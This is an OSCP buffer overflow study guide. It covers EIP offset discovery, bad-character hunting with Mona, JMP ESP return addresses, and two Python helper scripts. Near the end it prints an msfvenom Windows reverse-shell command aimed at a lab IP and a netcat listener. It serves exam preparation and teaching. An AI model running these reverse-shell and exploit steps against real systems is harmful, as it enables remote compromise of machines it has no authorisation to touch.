Buffer Overflow Preparation for OSCP

YevhSec1
4 min read · Dec 2, 2021

In this short article, I would like to describe the main steps in the most straightforward words and give a brief overview of how a buffer overflow exploit is put together. You should be ready to solve this type of task for the OSCP exam.

What you will have to work with during this task:

  1. Python exploit code
  2. Immunity debugger
  3. Mona for Immunity debugger

Main steps:

  1. Connection to the Debugging machine
  2. Fuzzing (skipped for OSCP)
  3. Identifying the EIP register offset value
  4. Controlling the EIP value
  5. Identifying the bad character
  6. Identifying the returning address
  7. Adding padding
  8. Generating a reverse shell with msfvenom
  9. Getting a shell

Steps overview:

1) Connection to the debugging machine

xfreerdp +clipboard /u:USERNAME /p:PASSWORD /cert:ignore /v:MACHINE_IP /workarea

3) Identifying the EIP register offset value

Note: generate a cyclic pattern 400 bytes longer than the string that crashed the server: VALUE = CRASH + 400.

locate pattern_create.rb

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l VALUE

Set up Mona folder

!mona config -set workingfolder c:\mona\%p

Find EIP offset

!mona findmsp -distance VALUE

[Screenshot: Mona result]

Add it as the offset value in the exploit.
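As an added illustration of what pattern_create.rb and `!mona findmsp` do under the hood (this is example code written for this article, not the author's exploit and not Metasploit's or Mona's own code), the following Python reproduces the Aa0Aa1... cyclic pattern, looks up a crash EIP value in it to get the offset, and converts an address to the little-endian byte order an x86 exploit has to send. The EIP value 0x6F43396E used at the bottom is a constructed sample, not a value from the article.

```python
import string
import struct
from itertools import product


def cyclic_pattern(length: int) -> bytes:
    """Reproduce the pattern_create.rb sequence Aa0Aa1Aa2 ... Zz9 and cut it to `length` bytes.

    The 26*26*10 triples give 20280 unique bytes in which every 4-byte window occurs once,
    which is more than enough for the pattern sizes OSCP-style targets need.
    """
    out = bytearray()
    for upper, lower, digit in product(string.ascii_uppercase,
                                       string.ascii_lowercase,
                                       string.digits):
        out += (upper + lower + digit).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def dword_at(pattern: bytes, offset: int) -> int:
    """The value a 32-bit debugger shows in a register overwritten by pattern[offset:offset+4].

    x86 is little-endian, so the register reads the four bytes in reverse order.
    """
    return struct.unpack("<I", pattern[offset:offset + 4])[0]


def eip_offset(pattern: bytes, eip: int) -> int:
    """Equivalent of pattern_offset.rb / the EIP line of `!mona findmsp -distance VALUE`.

    Packs the EIP value back into the byte order it had in the pattern and searches for it.
    """
    needle = struct.pack("<I", eip)
    idx = pattern.find(needle)
    if idx == -1:
        raise ValueError(f"EIP {eip:#010x} is not in the pattern; the crash did not come from it")
    return idx


def to_little_endian(addr: int) -> bytes:
    """Turn a return address such as 0x625011af into the bytes the exploit must send (\\xaf\\x11\\x50\\x62)."""
    return struct.pack("<I", addr)


if __name__ == "__main__":
    pattern = cyclic_pattern(2400)
    crash_eip = 0x6F43396E          # constructed sample value, as if read from Immunity after the crash
    print("EIP offset:", eip_offset(pattern, crash_eip))
    print("return address bytes:", to_little_endian(0x625011af))
```

The same `to_little_endian` call is what turns the JMP ESP address found in step 6 into the `\xaf\x11\x50\x62` form shown there.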

4) Controlling the EIP value

Add the “BBBB” as the “retn” value. Then check the EIP register value.

[Screenshot: exploit code]

[Screenshot: result in the debugger]

5) Identifying the bad characters

Note: \x00 is a bad character by default. Use the following string as the payload for identifying the bad characters.

\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff

[Screenshot: exploit code]

Set up the Mona bytearray

!mona bytearray -b "\x00"

[Screenshot: ESP register value after the crash]

[Screenshot: Mona]

!mona compare -f C:\mona\oscp\bytearray.bin -a ESP_ADDRESS

Remove the bad char from the payload, crash the server again, and add the removed char to the Mona bytearray:

!mona bytearray -b "\x00\x07"

After the crash, compare the Mona bytearray with the memory at the ESP address again.

[Screenshot: removing the char]

Note: you should remove all possible bad chars one by one. In the end you will have the list of bad chars, for example "\x00\x07\x2e\xa0".
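To make the send / crash / compare loop above concrete, here is an added Python example (written for this article, not the author's code and not Mona's implementation) that mimics `!mona bytearray -b` and `!mona compare`: it builds the probe string minus the known bad chars, finds the first byte that differs between what was sent and what landed at ESP, and repeats until the dump is clean. Because no real crashed process is available here, `simulated_memory_at_esp` is a constructed stand-in that mangles three bytes the way a real service might; in practice it is replaced by the bytes the debugger shows at the ESP address.

```python
def bytearray_without(excluded) -> bytes:
    """Same idea as `!mona bytearray -b "..."`: all 256 byte values minus the ones already known to be bad."""
    skip = set(excluded)
    return bytes(b for b in range(256) if b not in skip)


def first_mismatch(expected: bytes, memory: bytes):
    """Same idea as `!mona compare`: walk the sent bytes against what is in memory at ESP.

    Returns (index, expected_byte) for the first divergence, or None when the dump matches.
    """
    for i, (sent, seen) in enumerate(zip(expected, memory)):
        if sent != seen:
            return i, sent
    if len(memory) < len(expected):          # dump cut short: the next byte never made it
        return len(memory), expected[len(memory)]
    return None


def find_bad_chars(read_memory_at_esp, known_bad=(0x00,)) -> list:
    """Remove one bad char per round, exactly like the manual loop in the article, until the dump is clean."""
    bad = set(known_bad)
    while True:
        probe = bytearray_without(bad)
        miss = first_mismatch(probe, read_memory_at_esp(probe))
        if miss is None:
            return sorted(bad)
        bad.add(miss[1])


def mona_format(chars) -> str:
    """Render the list the way the article and the msfvenom -b flag write it: \\x00\\x07..."""
    return "".join(f"\\x{b:02x}" for b in chars)


# Constructed stand-in for the crashed service (NOT a real target): 0x07 becomes a null byte,
# 0x2e is dropped and 0xa0 becomes a space, so the loop above has something to discover.
_SIMULATED_MANGLING = {0x07: b"\x00", 0x2e: b"", 0xa0: b"\x20"}


def simulated_memory_at_esp(payload: bytes) -> bytes:
    """What 'memory at ESP' looks like after the constructed service has mangled the payload."""
    return b"".join(_SIMULATED_MANGLING.get(b, bytes([b])) for b in payload)


if __name__ == "__main__":
    bad = find_bad_chars(simulated_memory_at_esp)
    print("bad chars:", mona_format(bad))
```

One caveat the loop shows: a dropped byte (0x2e here) shifts every later byte by one, so everything after it looks corrupted. That is why the comparison stops at the first mismatch and the article removes one character at a time instead of trusting the whole diff.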

6) Identifying the return address

!mona jmp -r esp -cpb "\x00\x07\x2e\xa0"

So we have the value 0x625011af.

Convert the return address into the little-endian byte order that we can use in our Python code:

0x625011af → \xaf\x11\x50\x62

7) Adding padding

padding = b"\x90" * 16

8) Generating a reverse shell with msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT EXITFUNC=thread -b "BAD_CHARS" -f python -v payload

Example

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.3 LPORT=443 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f python -v payload

Paste the generated payload variable into the final exploit.

9) Getting a shell

Start a netcat listener

sudo nc -lvnp 443

Run the exploit and get a shell.

Follow me and stay secure!


MSc in Cyber Security, OSCP, eWPTXv2, CEH Master. Awarded by Apple, Trello, Paysera..